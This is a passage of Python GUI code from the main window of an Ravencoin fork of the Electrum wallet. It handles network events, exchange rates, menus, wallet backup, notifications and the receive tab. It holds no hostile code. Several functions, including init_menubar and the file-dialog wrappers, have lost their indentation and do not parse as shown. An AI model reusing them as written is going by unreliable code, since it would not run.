    self.wallet.clear_coin_price_cache()
    self.new_fx_history_signal.emit()
def setup_exception_hook(self):
    """Install the crash-reporter exception hook for this window."""
    Exception_Hook(self)
def on_fx_history(self):
    """GUI-thread handler: refresh history and addresses after new fiat
    history data arrived."""
    self.history_model.refresh('fx_history')
    self.address_list.update()
def on_quotes(self, b):
    """Network-thread callback for 'on_quotes': hand off to the GUI thread."""
    self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
    """GUI-thread handler for fresh exchange-rate quotes: refresh the
    status bar, re-trigger the amount edits so they pick up the new rate,
    and refresh history/addresses if spot rates were used there."""
    self.update_status()
    # Re-emit textEdited on whichever edit (fiat or coin) was last touched,
    # for both the send and receive forms.
    for fiat_edit, coin_edit in ((self.fiat_send_e, self.amount_e),
                                 (self.fiat_receive_e, self.receive_amount_e)):
        edit = fiat_edit if fiat_edit.is_last_edited else coin_edit
        edit.textEdited.emit(edit.text())
    # History tab needs updating if it used spot
    if self.fx.history_used_spot:
        self.history_model.refresh('fx_quotes')
        self.address_list.update()
def toggle_tab(self, tab):
    """Show or hide an optional tab, persisting the choice and keeping
    optional tabs in their original relative order when re-inserted."""
    key = 'show_{}_tab'.format(tab.tab_name)
    show = not self.config.get(key, False)
    self.config.set_key(key, show)
    label = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
    tab.menu_action.setText(label)
    if not show:
        self.tabs.removeTab(self.tabs.indexOf(tab))
        return
    # Find out where to place the tab: before the first optional tab
    # whose original position is greater than ours.
    index = len(self.tabs)
    for i in range(len(self.tabs)):
        try:
            if tab.tab_pos < self.tabs.widget(i).tab_pos:
                index = i
                break
        except AttributeError:
            # non-optional tabs have no tab_pos
            pass
    self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
def push_top_level_window(self, window):
    '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
    parented. This used to be done by explicitly providing the parent
    window, but that isn't something hardware wallet prompts know.'''
    self.tl_windows.append(window)
def pop_top_level_window(self, window):
    """Remove *window* from the top-level window stack (see push_top_level_window)."""
    self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
    '''Do the right thing in the presence of tx dialog windows'''
    override = self.tl_windows[-1] if self.tl_windows else None
    if override and test_func and not test_func(override):
        override = None  # only override if ok for test_func
    return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
    """Name used by the Logger mixin; delegates to the wallet's name."""
    #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
    return self.wallet.diagnostic_name()
def is_hidden(self):
    """Return True when the window is minimized or hidden (e.g. to tray)."""
    return self.isMinimized() or self.isHidden()
def show_or_hide(self):
    """Toggle window visibility (used by the tray icon)."""
    if self.is_hidden():
        self.bring_to_top()
    else:
        self.hide()
def bring_to_top(self):
    """Show the window and raise it above other windows."""
    self.show()
    self.raise_()
def on_error(self, exc_info):
    """Central error handler for background tasks: silently swallow user
    cancellations, show user-facing messages directly, and log + show
    everything else."""
    exc = exc_info[1]
    if isinstance(exc, UserCancelled):
        return
    if isinstance(exc, UserFacingException):
        self.show_error(str(exc))
        return
    try:
        self.logger.error("on_error", exc_info=exc_info)
    except OSError:
        pass  # see #4418
    self.show_error(str(exc))
# TODO: asset reissues
def on_network(self, event, *args):
    """Dispatch a network-thread event.

    Cheap bookkeeping happens here; anything that touches widgets is
    forwarded to the GUI thread via network_signal.
    """
    if event == 'wallet_updated':
        if args[0] == self.wallet:
            self.need_update.set()
    elif event == 'network_updated':
        self.gui_object.network_updated_signal_obj.network_updated_signal.emit(event, args)
        self.network_signal.emit('status', None)
    elif event == 'blockchain_updated':
        # to update number of confirmations in history
        self.need_update.set()
    elif event == 'new_transaction':
        wallet, tx = args
        if wallet == self.wallet:
            self.tx_notification_queue.put(tx)
    elif event in ('status', 'banner', 'verified', 'fee', 'fee_histogram'):
        # Handle in GUI thread
        self.network_signal.emit(event, args)
    else:
        self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
    """Handle a network event on the GUI thread (forwarded by on_network)."""
    if event == 'status':
        self.update_status()
    elif event == 'banner':
        self.console.showMessage(args[0])
    elif event == 'verified':
        wallet, tx_hash, tx_mined_status = args
        if wallet == self.wallet:
            self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
    elif event in ('fee', 'fee_histogram'):
        # Both fee events refresh the slider under dynamic fees; only the
        # histogram event additionally updates the history model.
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.require_fee_update = True
        if event == 'fee_histogram':
            self.history_model.on_fee_histogram()
    else:
        self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
    """Resolve the configured OpenAlias on a background daemon thread.

    Resets self.alias_info, then (if an alias is configured) resolves it
    off the GUI thread and emits alias_received_signal when done.
    """
    self.alias_info = None
    alias = self.config.get('alias')
    if alias:
        alias = str(alias)
        def f():
            self.alias_info = self.contacts.resolve_openalias(alias)
            self.alias_received_signal.emit()
        # daemon=True in the constructor replaces the deprecated
        # Thread.setDaemon() call.
        threading.Thread(target=f, daemon=True).start()
def close_wallet(self):
    """Log the wallet being closed and let plugins clean up."""
    if self.wallet:
        self.logger.info(f'close_wallet {self.wallet.storage.path}')
        run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
    """Attach *wallet* to this window and refresh all wallet-driven UI.

    Spawns the wallet's task thread, updates menus/tabs, restores window
    geometry, and runs plugin hooks; finally checks the wallet for
    internal address corruption and reports it if found.
    """
    wallet.thread = TaskThread(self, self.on_error)
    self.update_recently_visited(wallet.storage.path)
    self.need_update.set()
    # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
    # update menus
    self.seed_menu.setEnabled(self.wallet.has_seed())
    self.update_lock_icon()
    self.update_buttons_on_seed()
    self.update_console()
    self.clear_receive_tab()
    self.request_list.update()
    self.tabs.show()
    self.init_geometry()
    if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
        self.hide()
    else:
        self.show()
    self.watching_only_changed()
    run_hook('load_wallet', wallet, self)
    try:
        wallet.try_detecting_internal_addresses_corruption()
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        send_exception_to_crash_reporter(e)
def init_geometry(self):
    """Restore the saved window geometry, falling back to a sane default.

    Any problem with the stored value (missing, malformed, off-screen)
    falls through to the default geometry.
    """
    winpos = self.wallet.storage.get("winpos-qt")
    try:
        screen = self.app.desktop().screenGeometry()
        # NOTE: `assert` is stripped under -O; kept to match existing behavior.
        assert screen.contains(QRect(*winpos))
        if not self.isMaximized():
            self.setGeometry(*winpos)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # propagate instead of being swallowed.
        self.logger.info("using default geometry")
        if not self.isMaximized():
            self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
    """Refresh the window title and menu availability to reflect whether
    the wallet is watching-only."""
    name = "Electrum-raven Testnet" if constants.net.TESTNET else "Electrum-raven"
    title = f"{name} {ELECTRUM_VERSION} - {self.wallet.basename()}"
    extra = [self.wallet.storage.get('wallet_type', '?')]
    if self.wallet.is_watching_only():
        extra.append(_('watching only'))
    title += f" [{', '.join(extra)}]"
    self.setWindowTitle(title)
    # Enable/show only the actions this wallet type supports.
    self.password_menu.setEnabled(self.wallet.may_have_password())
    self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
    self.import_address_menu.setVisible(self.wallet.can_import_address())
    self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
    """Pop a warning dialog when the loaded wallet is watching-only."""
    if self.wallet.is_watching_only():
        msg = ' '.join([
            _("This wallet is watching-only."),
            _("This means you will not be able to spend Ravencoin with it."),
            _("Make sure you own the seed phrase or the private keys, before you request Ravencoin to be sent to this wallet.")
        ])
        self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
    """Show a one-time-per-process warning dialog when running on testnet,
    with a checkbox to permanently opt out."""
    if not constants.net.TESTNET:
        return
    # user might have opted out already
    if self.config.get('dont_show_testnet_warning', False):
        return
    # only show once per process lifecycle
    if getattr(self.gui_object, '_warned_testnet', False):
        return
    self.gui_object._warned_testnet = True
    msg = ''.join([
        _("You are in testnet mode."), ' ',
        _("Testnet coins are worthless."), '\n',
        _("Testnet is separate from the main Ravencoin network. It is used for testing.")
    ])
    cb = QCheckBox(_("Don't show this again."))
    cb_checked = False
    def on_cb(x):
        # closure flag updated by the checkbox's stateChanged signal
        nonlocal cb_checked
        cb_checked = x == Qt.Checked
    cb.stateChanged.connect(on_cb)
    self.show_warning(msg, title=_('Testnet'), checkbox=cb)
    # persist the opt-out only after the dialog is dismissed
    if cb_checked:
        self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
    """Prompt for a wallet file and open it in a new window."""
    try:
        wallet_folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
    if filename:
        self.gui_object.new_window(filename)
def backup_wallet(self):
    """Save a copy of the current wallet file to a user-chosen path."""
    path = self.wallet.storage.path
    wallet_folder = os.path.dirname(path)
    filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
    if not filename:
        return
    new_path = os.path.join(wallet_folder, filename)
    # Copying a file onto itself is silently skipped.
    if new_path != path:
        try:
            shutil.copy2(path, new_path)
            self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
        except Exception as reason:
            # Narrowed from BaseException so KeyboardInterrupt/SystemExit
            # are not swallowed by the error dialog.
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
    """Promote *filename* in the recently-open list (capped at 5 existing
    files), persist it, and rebuild the "Recently open" menu."""
    recent = self.config.get('recently_open', [])
    try:
        # presumably a sanity check: discard the stored value if it
        # isn't a sortable list
        sorted(recent)
    except:
        recent = []
    if filename in recent:
        recent.remove(filename)
    recent.insert(0, filename)
    # drop entries whose files no longer exist, keep the 5 most recent
    recent = [path for path in recent if os.path.exists(path)]
    recent = recent[:5]
    self.config.set_key('recently_open', recent)
    self.recently_visited_menu.clear()
    # NOTE(review): iterating sorted(recent) numbers the Ctrl+N shortcuts
    # alphabetically rather than by recency — confirm this is intended
    # (upstream Electrum iterates in recency order).
    for i, k in enumerate(sorted(recent)):
        b = os.path.basename(k)
        def loader(k):
            # bind k via the argument to avoid the late-binding closure pitfall
            return lambda: self.gui_object.new_window(k)
        self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
    self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
    """Return the absolute directory containing the current wallet file."""
    return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
    """Start the new/restore wallet wizard with a fresh default filename."""
    try:
        folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    full_path = os.path.join(folder, get_new_wallet_name(folder))
    self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addAction(_("&Log viewer"), self.logview_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction("&RVN Electrum Wiki", lambda: webopen("https://raven.wiki/wiki/Electrum"))
help_menu.addAction("&GetRavencoin.org", lambda: webopen("https://GetRavencoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
help_menu.addAction(_("&Donate to developer"), self.donate_to_dev)
self.setMenuBar(menubar)
def donate_to_server(self):
    """Open the Send tab pre-filled with the current server's donation URI.

    Shows an error instead when the server does not advertise a
    donation address.
    """
    donation_addr = self.network.get_donation_address()
    if not donation_addr:
        self.show_error(_('No donation address for this server'))
        return
    host = self.network.get_parameters().host
    self.pay_to_URI('raven:%s?message=donation for %s' % (donation_addr, host))
def donate_to_dev(self):
    """Open the Send tab pre-filled with the developer donation address."""
    uri = 'raven:RDRczYCUeLwXVnrKMYHKYLS1oPc9aCxGnG?message=Developer donation'
    self.pay_to_URI(uri)
def show_about(self):
    """Show the modal "About" dialog with the application version."""
    QMessageBox.about(self, "Electrum-rvn",
                      (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                       _("Electrum's focus is speed, with low resource usage and simplifying Ravencoin.") + " " +
                       _("You do not need to perform regular backups, because your wallet can be "
                         "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                       _("Startup times are instant because it operates in conjunction with high-performance "
                         "servers that handle the most complicated parts of the Ravencoin system.") + "\n\n" +
                       _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
    """Open the update-check window, optionally for a specific *version*.

    The window is stored on gui_object (a single shared slot), so opening
    it again replaces the previous instance.
    """
    self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
    """Show a rich-text message box pointing users to the GitHub issue tracker."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
    """Show desktop notifications for newly arrived wallet transactions.

    Drains self.tx_notification_queue, rate-limited to one burst per 20
    seconds and suppressed while the wallet is still syncing. Three or
    more queued transactions are combined into one summary notification;
    fewer are notified individually.
    """
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.logger.info("Notifying GUI about new transactions")
    txns = []
    while True:
        try:
            txns.append(self.tx_notification_queue.get_nowait())
        except queue.Empty:
            break
    # Collect the received RVN amount for each relevant transaction once,
    # instead of duplicating the wallet-delta loop in both branches below.
    amounts = []
    for tx in txns:
        is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
        if is_relevant:
            amounts.append(v['RVN'])
    # Combine the transactions if there are at least three
    if len(txns) >= 3:
        total_amount = sum(amounts)
        self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                    .format(len(txns), self.format_amount_and_units(total_amount)))
    else:
        for amount in amounts:
            self.notify(_("New transaction: {}").format(self.format_amount_and_units(amount)))
def notify(self, message):
    """Show *message* as a system-tray balloon notification.

    Prefers the QIcon overload of showMessage; falls back to the
    QSystemTrayIcon.Information overload when the Qt bindings raise
    TypeError for it (icon overload requires Qt >= 5.9, per the comment).
    """
    if self.tray:
        try:
            # this requires Qt 5.9
            self.tray.showMessage("Electrum-rvn", message, read_QIcon("electrum_dark_icon"), 20000)
        except TypeError:
            self.tray.showMessage("Electrum-rvn", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
    """Periodic poll driven by the GUI timer: refresh wallet state, fee and notifications."""
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    elif not self.wallet.up_to_date:
        # this updates "synchronizing" progress
        self.update_status()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee (flag set by update_fee(); recomputed here, off the edit signal path)
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Format satoshi amount *x* per the wallet's zero-padding and decimal-point settings."""
    return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
    """Format *amount* with the base unit, appending the fiat value when FX is available."""
    text = self.format_amount(amount) + ' ' + self.base_unit()
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text += ' (%s)' % fiat
    return text
def format_fee_rate(self, fee_rate):
    """Format *fee_rate* (sat/kB) for display as sat/byte."""
    # fee_rate is in sat/kB
    return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
    """Return the configured decimal point used for amount display."""
    return self.decimal_point
def base_unit(self):
    """Return the display unit name corresponding to the configured decimal point."""
    return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a coin-amount edit and a fiat edit in sync in both directions.

    Each edit carries a `follows` flag; it is set while programmatically
    updating the *other* edit so the resulting textChanged signal does not
    trigger an infinite update loop. *fee_e* may be None; when present it
    is cleared/refreshed alongside the coin amount.
    """
    def edit_changed(edit):
        if edit.follows:
            # Change originated from our own programmatic update: ignore.
            return
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # No usable rate or no amount: blank the counterpart field(s).
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status-bar text, tray tooltip and connection icon.

    Chooses between Offline / Synchronizing / Lagging / Balance displays
    depending on network state and wallet sync progress.
    """
    if not self.wallet:
        return
    status_text = ""
    if self.network is None:
        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        local_height = self.network.get_local_height()
        server_lag = local_height - server_height
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # Up to date: show confirmed balance plus unconfirmed/unmatured parts.
            bal = self.wallet.get_balance()['RVN']
            c = bal[0]
            u = bal[1]
            x = bal[2]
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
        if local_height < server_height-100:
            status_text = "Syncing headers {}/{}".format(local_height,server_height)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_label.setText(status_text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar; refresh all tabs when settled or offline."""
    self.update_status()
    connected = bool(self.network) and self.network.is_connected()
    if self.wallet.up_to_date or not connected:
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Refresh every list view and the payto completions.

    Updates addressed to a wallet other than the one this window shows
    are ignored.
    """
    if wallet is not None and wallet != self.wallet:
        return
    self.history_model.refresh('update_tabs')
    for view in (self.request_list, self.address_list, self.asset_list,
                 self.utxo_list, self.contact_list, self.invoice_list):
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build the History tab: model + list view with its filter toolbar."""
    self.history_model = HistoryModel(self)
    self.history_list = l = HistoryList(self, self.history_model)
    self.history_model.set_view(self.history_list)
    # The list is its own searchable target for the Ctrl+F search box.
    l.searchable_list = l
    toolbar = l.create_toolbar(self.config)
    toolbar_shown = self.config.get('show_toolbar_history', False)
    l.show_toolbar(toolbar_shown)
    return self.create_list_tab(l, toolbar)
def show_address(self, addr):
    """Open the modal details dialog for address *addr*."""
    from . import address_dialog
    dlg = address_dialog.AddressDialog(self, addr)
    dlg.exec_()
def show_asset(self, asset):
    """Open the modal details dialog for *asset*."""
    from . import asset_dialog
    dlg = asset_dialog.AssetDialog(self, asset)
    dlg.exec_()
def mark_asset_as_spam(self, asset):
    """Add an exact-match blacklist entry for *asset* and refresh views."""
    # NOTE(review): asset is interpolated into a regex pattern unescaped —
    # fine for plain names; verify behavior for assets containing regex
    # metacharacters.
    pattern = '^' + asset + '$'
    self.asset_blacklist.append(pattern)
    self.config.set_key('asset_blacklist', self.asset_blacklist, True)
    self.asset_list.update()
    self.history_model.refresh('Marked asset as spam')
def show_transaction(self, tx, tx_desc = None):
    '''Open the transaction-details dialog for *tx*.

    tx_desc is set only for txs created in the Send tab.
    '''
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build the Receive tab: address/description/amount fields, expiry combo,
    QR widget and the saved-requests list. Returns the tab's root widget."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Ravencoin address where the payment should be received. Note that each payment request uses a different Ravencoin address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    # Fiat companion field; hidden unless the FX plugin is enabled.
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Ravencoin addresses.'),
        _('The ravencoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    # Read-only label shown in place of the combo for existing requests;
    # occupies the same grid cell.
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # Clickable QR code; toggles the detached QR window.
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout
